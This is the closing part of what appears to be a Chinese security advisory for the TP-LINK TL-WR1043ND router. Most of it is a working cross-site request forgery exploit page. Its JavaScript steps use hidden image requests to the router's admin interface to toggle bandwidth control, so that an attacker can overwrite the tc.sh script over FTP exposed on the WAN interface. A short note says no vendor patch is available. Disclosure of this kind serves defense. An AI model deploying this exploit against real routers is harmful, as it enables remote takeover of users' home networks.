// STEP 5 - Enable Bandwidth Control (ensures that STEP 5 will re-run tc.sh)
function csrf5() {
document.write('CSRF5...<br>');
document.write('<img src="http://192.168.1.1/userRpm/QoSCfgRpm.htm?QoSCtrl=1
&userWanType=0&up_bandWidth=512&down_bandWidth=2048&Save=Save"
>');
document.write('<b>FTP now up and running on WAN interface.<br>');
document.write('<b>Attacker should begin overwriting tc.sh within
the next 10 seconds...</b>');
window.setTimeout(csrf6, 10000);
}
// STEP 6 - Disable Bandwidth Control (while attacker is overwriting tc.sh)
function csrf6() {
document.write('CSRF6');
document.write('<img src="http://192.168.1.1/userRpm/QoSCfgRpm.htm?QoSCtrl=0
&userWanType=0&up_bandWidth=512&down_bandWidth=2048&Save=Save"
>');
}
csrf1();
</script>
CSRF1...<br>
</body>
</html>
------------------------------------------------------------------------------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
TP-LINK
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
?model=TL-WR1043ND